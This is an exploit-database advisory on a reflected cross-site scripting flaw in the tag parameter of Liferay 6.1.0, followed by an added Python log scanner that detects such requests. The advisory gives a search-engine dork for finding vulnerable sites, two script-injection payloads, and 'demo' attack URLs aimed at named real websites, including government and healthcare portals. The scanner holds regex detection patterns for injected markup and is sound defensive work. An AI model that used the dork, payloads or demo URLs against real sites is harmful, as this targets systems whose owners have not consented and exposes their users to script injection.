Liferay 6.1.0 tags Cross Site Scripting (XSS)

2017.12.21
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Title: Liferay 6.1.0 tags Cross Site Scripting (XSS)
[+] Date: 2017-12-22
[+] Author: Mostafa Gharzi
[+] Vendor Homepage: www.Liferay.com
[+] Tested on: Windows 10 & Kali Linux
[+] Vulnerable File: p_r_p_564233524_tag=
[+] Vulnerable Parameter: Get Method
[+] Dorks : inurl:p_r_p_564233524_tag= intext:"Content with tag"

### POC:
[+] http://Site/home?p_p_id=[]&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=[]&p_p_col_count=[]&p_r_p_564233524_tag=[XSS]
[+] http://Site/[Another name]?p_p_id=[]&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=[]&p_p_col_count=[]&p_r_p_564233524_tag=[XSS]

### Xss Alert Code:
"><svg onload=alert(/xss/)>
'><script>alert('xss');</script>
And Etc.

### Demo:
[+] http://antares.crea.gov.it:8080/en/tagcloud?p_p_id=148_INSTANCE_OFaFgv1XLKmW&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=5&p_p_col_count=6&p_r_p_564233524_resetCur=true&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E
[+] http://liferayportal.ir/web/pdn/19?p_p_id=101_INSTANCE_35mBiQIthh4N&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=2&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E
[+] http://www.carpentaria.qld.gov.au/home?p_p_id=101_INSTANCE_pUO347Uam9DO&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-3&p_p_col_count=1&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E
[+] http://www.alliance-healthcare.co.uk/latest-news?p_p_id=101_INSTANCE_jL0I&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E
[+] http://www.acmotec.com/ricerca-tags.html?p_p_id=148_INSTANCE_4LMOXz4UkLZN&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=4&p_p_col_count=6&p_r_p_564233524_resetCur=true&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E

### Special Thanks:
[+] CertCC.ir
[+] Gucert.ir
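
A log check for the parameter named in this advisory, as an added example (not part of the original advisory and not Liferay code): it flags requests whose `p_r_p_<id>_tag` value decodes to markup rather than a plain tag name. The combined access-log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter from the advisory; the numeric id is left generic (assumption).
TAG_PARAM = re.compile(r"^p_r_p_\d+_tag$")
# Markup a tag name should not carry. U+201C/U+201D are listed because the
# advisory's demo requests send %E2%80%9D rather than an ASCII quote.
# Heuristic: a legitimate tag containing an apostrophe will also be flagged.
SUSPICIOUS = re.compile(r"[<>\"'\u201c\u201d]|\bon\w+\s*=|javascript:", re.I)
# Request target inside a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, placeholder portlet id).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Dec/2017:10:00:01 +0000] "GET /home?p_p_id=101_INSTANCE_EXAMPLE'
    '&p_p_lifecycle=0&p_r_p_564233524_tag=news HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Dec/2017:10:00:05 +0000] "GET /home?p_p_id=101_INSTANCE_EXAMPLE'
    '&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E HTTP/1.1" 200 5233',
    '198.51.100.7 - - [22/Dec/2017:10:00:09 +0000] "GET /home?p_p_id=101_INSTANCE_EXAMPLE'
    '&p_r_p_564233524_tag=%2527%253E%253Cscript%253E HTTP/1.1" 200 5201',
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so that %253C is seen as '<'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_tag_values(log_line):
    """Return decoded tag values in one log line that contain markup."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    values = (fully_decode(v) for k, v in parse_qsl(query, keep_blank_values=True)
              if TAG_PARAM.match(k))
    return [v for v in values if SUSPICIOUS.search(v)]

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    return [(n, v) for n, line in enumerate(lines, 1)
            for v in suspicious_tag_values(line)]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious tag value {value!r}")
```

A hit only shows that markup was sent in the tag parameter; whether the portal reflected it unescaped still has to be confirmed against the response or by patching the affected instance.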



Copyright 2018, cxsecurity.com

 
